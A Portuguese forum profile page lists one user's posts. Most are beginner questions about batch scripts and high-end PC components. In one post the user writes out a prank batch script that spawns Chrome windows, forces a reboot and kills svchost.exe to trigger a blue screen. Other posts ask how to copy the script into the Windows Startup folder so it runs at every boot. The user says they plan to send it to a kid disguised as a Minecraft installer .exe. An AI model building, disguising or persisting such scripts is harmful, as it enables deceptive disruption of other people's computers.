Ir ao conteúdo
  • Cadastre-se

Predadorx Mine

Membro Pleno
  • Posts

    41
  • Cadastrado em

  • Última visita

Reputação

4
  1. eu tenho um programa,ai quero um comando em que eu quando executado abra uma imagem em uma determinada pasta,ex: tenho um jogo,ai dentro de downloads eu tenho uma pasta chamada:(joguinho alpha) e dentro dessa pasta tem 2 coisas:1-o arquivo batch (.bat) e outra pasta chamada (fotos) e dentro dessa pasta tenho algumas fotos. então eu quero saber qual comando eu coloco no arquivo batch (.bat) para abrir uma determinada imagem dentro da pasta (fotos) obs:isso seria tipo um joguinho mesmo,ai quero enviar pra um amigo
  2. dos que tu falou só não vou precizar de.........na vdd tava parando pra analisar,vou precizar disso tudo q tu falasse,incluisive cabo hdmi pra eu colocar mais de 1 monitor e vou precizar principalmente de m.2 que esse vai ser cerca de 75% de todo o armazenamento que vou ter (sou bem organizado e pretendo baixar/fazer muita coisa com ele)
  3. na vdd é em questão de suportar tudo,jogos,cpu,gpu,jogos hyper pesados,varios e varios programas em 2 plano e abertos ao mesmo tempo.esse realmente É A MELHOR que existe no mercado pra INTEL?
  4. qual melhor placa-mãe? placa-mãe gigabyte x299x aorus xtreme ou gigabyte z490 aorus xtreme waterforce one size eu quero a melhor,to nem ai o preço,quero a melhor,se tiver uma melhor que essas 2 me fala,quero uma placa-mãe da mais forte do mercado inteiro,tanto faz intel ou amd,só quero a melhor placa-mãe.QUERO AS TOP 5 MELHORES QUE EXISTEM.
  5. 1-e a intel ela não é melhor não? 2-16gb?tem memoria que tem mais que 16gb certeza. 3-b450?tem a x570 aorus extreme,acho q esse é melhor. 4-tem ssd de mais de 2tb,tem de 4tb,e também tem m.2 5-faltou tu falar sobre o water cooler box.
  6. não tenho muito o que dizer,só quero a MELHOR configuração pra montar o pc? 100% completo tudo da melhor qualidade e ultima geração não tem limite de valor,apenas as melhores coisas possiveis de comprar.
  7. funcionou funcionou,é porque queria criar um arquivo .bat irritante,tipo.eu nos scripts desse carro.bat teria: start chrome.exe start chrome.exe start chrome.exe start chrome.exe start chrome.exe shutdown -r -t 20 -c "voce caiu na pegadinha do mario gamer hahaha" pause ja que voce sabe mais do que eu nesses scripts,voce sabe muito bem o que acontesse se esse comando entrar na pasta startup né hehehe,e não,não vou usar isso pro mal,é porque tenho um bloco de notas,que tem TODOS os comandos que eu sei,e explicando cada um,ai por isso eu to querendo saber como fazer esses scripts,pra colocar mais no meu texto. obs:aliais,tem um kid ae que eu quase perdi o meu discord,e vou enviar pra ele esse comando,só que em formato de .exe,e com o nome e icone do minecraft,e dizer que é um instalador. >:) e se eu quiser que sempre dê tela azul,eu escrevo: taskkill /f /im svchost.exe se tu não sabe:taskkill /f /im svchost.exe dá tela azul,ai quando da tela azul,reinicia o pc,ai quando reiniciar,sabe quem vai tar esperando o pc iniciar?o minecraft.exe (carro.bat modificado para .exe) >:) @ricardo_br mano,é muito estranho o meu windows,eu copiei o codigo,e criei outro arquivo .bat,ai coloquei o codigo e salvei,ai quando eu abri o codigo,não copiou o arquivo só funciona se eu abrir esse arquivo ai que tu me desse ou copiando esse teu arquivo que tu me desse,mas criando um .bat e colocando o codigo não vai tu sabe porque ta assim?
  8. na vdd não faço nem ideia,vou tentar aqui,qualquer coisa eu edito aqui (editado=) sim,ja testei,e testei outras combinações também mas não todas as possiveis
  9. mano,é muito aleatorio meu codigo vei,tipo,não é um unico codigo,eu fico misturando VARIAS E VARIAS combinações diferentes até um ter que ir,mas eu fico misturando esses codigos a partir desse codigo: cd onedrive\área de trabalho\ xcopy carro.bat c:\users\nomedeusuario\onedrive\área de trabalho\ C:\Users\anomedeusuario\Downloads ai eu fico movendo um codigo pra cá,movendo pra lá,modificando um codigo por outro parecido,tipo copy=xcopy/robocopy,e os kralha4.ai até que alguma combinação dessa da certo.
  10. vou tentar se der certo eu edito esse post e digo.(editado=) não deu fiz do jeito que esta ai e mesmo assim não deu,até tentei executar como adm e não deu.pelo que eu me lembro eu ACHO quue não usei o userprofile,tipo copy [%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu....]eu usei tipo [c:\users\nomedeusuario\.....].
  11. ola,quero saber como copiar arquivos para via .bat,vou dar um exemplo: quero copiar o arquivo (carro.bat) para a pasta C:\Users\nomedeusuario\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ (essa pasta,qualquer arquivo executavel tiver nessa pasta ele inicia com o windows né) e esse arquivo carro.bat ele está na área de trabalho C:\Users\nomedeusuario\OneDrive\Área de Trabalho minha pergunta:como fazer PARA COPIAR ESSE ARQUIVO CARRO.BAT PARA A PASTA QUE INICIA COM O WINDOWS? obs:sempre dá problema toda vez que vai copiar não copia,só é possivel copiar até a pasta programs ou start menu,mas não consigo de jeito nenhum copiar esta pasta para o startup (uma vez eu consegui,só q não sei mais) complementação:tenho windows 10 home,versão 20H2
  12. ola. tenho uma CPU intel celeron n4100 1.10GHz,e uma GPU intel UHD graphics 600,e 4gb de RAM. eu persebi que quando entro no gerenciador de tarefas,o uso da CPU vai dos 90% a 100%,mas a GPU RARAMENTE vai até os 4%. não sei se memoria RAM tem alguma coisa a ver,mas a media é de 50% a 90% (é meio difícil chegar a 90% só quando tem varios programas abertos) então,minha pergunta:SERA QUE DA PRA EQUILIBRAR O USO DA CPU E GPU?
  13. ola,sou iniciante nesses negocios de programação,então quero tirar uma duvida:um comando para executar algo em 2 plano,ex: 1-@echo off 2- 3-start chrome.exe 4- por exemplo,eu quero abrir o chrome,só que quero deixar ele em 2 plano,então vai a pergunta: 1º)qual comando eu uso para abrir o chrome em 2 plano? 2º)e em qual linha (2 ou 4) eu coloco esse comando? tem que ser (.bat) porque não entendo esses c#,java,e esses troços ai,só quero saber (por enquanto) em .bat.

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas comunidades sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×
×
  • Criar novo...